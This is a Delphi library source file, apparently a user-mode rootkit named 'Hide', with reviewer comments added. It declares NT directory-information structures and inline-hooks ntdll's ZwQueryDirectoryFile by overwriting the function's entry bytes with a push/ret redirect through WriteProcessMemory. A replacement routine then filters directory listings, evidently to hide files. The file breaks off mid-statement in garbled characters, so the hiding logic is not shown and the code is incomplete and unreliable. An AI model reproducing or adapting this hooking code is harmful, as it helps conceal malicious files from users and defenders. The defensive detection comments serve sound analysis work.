📄 hide.dpr
library Hide;
uses
Windows,
Native,Dialogs,SysUtils;
// Six-byte packed buffer (dword + word).
// The OldZwq instance of this type is what TrueZwQueryDirectoryFile writes
// over PtrZwq before it calls the real ntdll routine.
// NOTE(review): presumably holds the saved original bytes of the patched
// function; the code that fills it is not visible in this part of the file.
type
OldCode = packed record
One: dword; // first four bytes of the buffer
two: word; // last two bytes of the buffer
end;
// Hand-written declaration named after the NT directory-enumeration structure
// FILE_DIRECTORY_INFORMATION, plus its pointer type.
// Neither is referenced in the visible part of the file.
// NOTE(review): the layout has not been checked against the Windows headers;
// treat it as the author's approximation, not a reference definition.
type
FILE_DIRECTORY_INFORMATION = packed record
NextEntryOffset: ULONG; // link to the following entry in the returned buffer
Unknown: ULONG; // named FileIndex in the documented Windows structure
CreationTime,
LastAccessTime,
LastWriteTime,
ChangeTime,
EndOfFile,
AllocationSize: int64; // six consecutive 64-bit fields
FileAttributes: ULONG;
FileNameLength: ULONG;
FileName: PWideChar;
end;
PFILE_DIRECTORY_INFORMATION=^FILE_DIRECTORY_INFORMATION;
// Hand-written declaration named after the NT structure
// FILE_FULL_DIRECTORY_INFORMATION. It has the same fields as
// FILE_DIRECTORY_INFORMATION plus EaInformationLength.
// Not referenced in the visible part of the file.
// NOTE(review): layout not checked against the Windows headers.
type
FILE_FULL_DIRECTORY_INFORMATION = packed record
NextEntryOffset: ULONG; // link to the following entry in the returned buffer
Unknown: ULONG; // named FileIndex in the documented Windows structure
CreationTime,
LastAccessTime,
LastWriteTime,
ChangeTime,
EndOfFile,
AllocationSize: int64; // six consecutive 64-bit fields
FileAttributes: ULONG;
FileNameLength: ULONG;
EaInformationLength: ULONG;
FileName: PWideChar;
end;
// Hand-written declaration named after the NT structure
// FILE_BOTH_DIRECTORY_INFORMATION, plus its pointer type.
// NewZwQueryDirectoryFile declares its Info/Prev locals with the pointer type
// and only acts when FileInformationClass = 3, which the file's own comment
// labels as this class.
// NOTE(review): layout not checked against the Windows headers.
type
FILE_BOTH_DIRECTORY_INFORMATION = packed record
NextEntryOffset: ULONG; // link to the following entry in the returned buffer
Unknown: ULONG; // named FileIndex in the documented Windows structure
CreationTime,
LastAccessTime,
LastWriteTime,
ChangeTime,
EndOfFile,
AllocationSize: int64; // six consecutive 64-bit fields
FileAttributes: ULONG;
FileNameLength: ULONG;
EaInformationLength: ULONG;
AlternateNameLength: ULONG;
AlternateName:array [0..11]of WideChar; // 12 wide characters for the short (8.3) name
FileName: PWideChar;
end;
PFILE_BOTH_DIRECTORY_INFORMATION=^FILE_BOTH_DIRECTORY_INFORMATION;
// Hand-written declaration named after the NT structure
// FILE_NAMES_INFORMATION (names only, no timestamps or sizes).
// Not referenced in the visible part of the file.
// NOTE(review): layout not checked against the Windows headers.
type
FILE_NAMES_INFORMATION = packed record
NextEntryOffset: ULONG; // link to the following entry in the returned buffer
Unknown: ULONG; // named FileIndex in the documented Windows structure
FileNameLength: ULONG;
FileName: PWideChar;
end;
// Packed byte / pointer / byte record: six bytes when pointers are 32-bit.
// The JmpZwq instance is what TrueZwQueryDirectoryFile writes back over PtrZwq
// after the real call returns.
// NOTE(review): the field names suggest a "push <address>; ret" redirect stub;
// the opcode values and target are assigned outside the visible code.
// For defenders: bytes of this shape at the entry of an ntdll export, differing
// from the on-disk image, indicate an inline user-mode hook.
far_jmp = packed record
PuhsOp: byte; // (sic) opcode byte preceding the pointer
PushArg: pointer; // address operand
RetOp: byte; // opcode byte following the pointer
end;
// Library-wide hook state. Nothing in the visible code initializes these
// variables; they are only read by TrueZwQueryDirectoryFile.
var
JmpZwq: far_jmp; // redirect stub written over PtrZwq after each pass-through call
OldZwq: OldCode; // bytes written over PtrZwq before each pass-through call
PtrZwq: pointer; // address both writes target; presumably the ntdll entry point - TODO confirm
// Static import of the ZwQueryDirectoryFile export from ntdll.dll (stdcall).
// Handles are declared as dword and the buffers as untyped pointers, so the
// compiler performs no type checking on what callers pass through.
// NOTE(review): the dword handle parameters assume a 32-bit target.
Function ZwQueryDirectoryFile(FileHandle: dword;
Event: dword;
ApcRoutine: pointer;
ApcContext: pointer;
IoStatusBlock: pointer;
FileInformation: pointer;
FileInformationLength: dword;
FileInformationClass: dword;
ReturnSingleEntry: bool;
FileName: PUnicodeString;
RestartScan: bool): NTStatus;
stdcall; external 'ntdll.dll';
// Pass-through to the real ntdll routine while the redirect is in place.
//
// Sequence, exactly as written below:
//   1. write SizeOf(OldCode) bytes from OldZwq over PtrZwq;
//   2. call the imported ZwQueryDirectoryFile with the caller's arguments unchanged;
//   3. write SizeOf(far_jmp) bytes from JmpZwq back over PtrZwq.
// Returns the NTSTATUS of step 2.
//
// INVALID_HANDLE_VALUE (-1) has the same value as the current-process
// pseudo-handle, so both writes modify this process's own memory.
//
// NOTE(review): the BOOL results of both WriteProcessMemory calls are ignored,
// and no lock around steps 1-3 is visible here, so the sequence is not
// protected against concurrent callers.
// For defenders: while the redirect is installed, the bytes at PtrZwq differ
// from the on-disk ntdll image; comparing the in-memory code section against
// the file on disk reveals this kind of patch.
Function TrueZwQueryDirectoryFile(FileHandle: dword;
Event: dword;
ApcRoutine: pointer;
ApcContext: pointer;
IoStatusBlock: pointer;
FileInformation: pointer;
FileInformationLength: dword;
FileInformationClass: dword;
ReturnSingleEntry: bool;
FileName: PUnicodeString;
RestartScan: bool): NTStatus;
stdcall;
var
Written: dword; // receives the byte count from WriteProcessMemory; never inspected
begin
// Step 1: put the OldZwq bytes at PtrZwq for the duration of the real call.
WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
@OldZwq, SizeOf(OldCode), Written);
// Step 2: forward every argument unchanged and keep the returned status.
Result := ZwQueryDirectoryFile(FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
FileInformation,
FileInformationLength,
FileInformationClass,
ReturnSingleEntry,
FileName,
RestartScan);
// Step 3: write the JmpZwq stub back over the same address.
WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
@JmpZwq, SizeOf(far_jmp), Written);
end;
Function NewZwQueryDirectoryFile(FileHandle: dword;
Event: dword;
ApcRoutine: pointer;
ApcContext: pointer;
IoStatusBlock: pointer;
FileInformation: pointer;
FileInformationLength: dword;
FileInformationClass: dword;
ReturnSingleEntry: bool;
FileName: PUnicodeString;
RestartScan: bool): NTStatus;
stdcall;
var
Info, Prev: PFILE_BOTH_DIRECTORY_INFORMATION;
begin
Result := TrueZwQueryDirectoryFile(FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
FileInformation,
FileInformationLength,
FileInformationClass,
ReturnSingleEntry,
FileName,
RestartScan);
if (FileInformationClass = 3) and // FILE_BOTH_DIRECTORY_INFORMATION
(Result = STATUS_SUCCESS) then
begin
showmessage('瑶溧 漕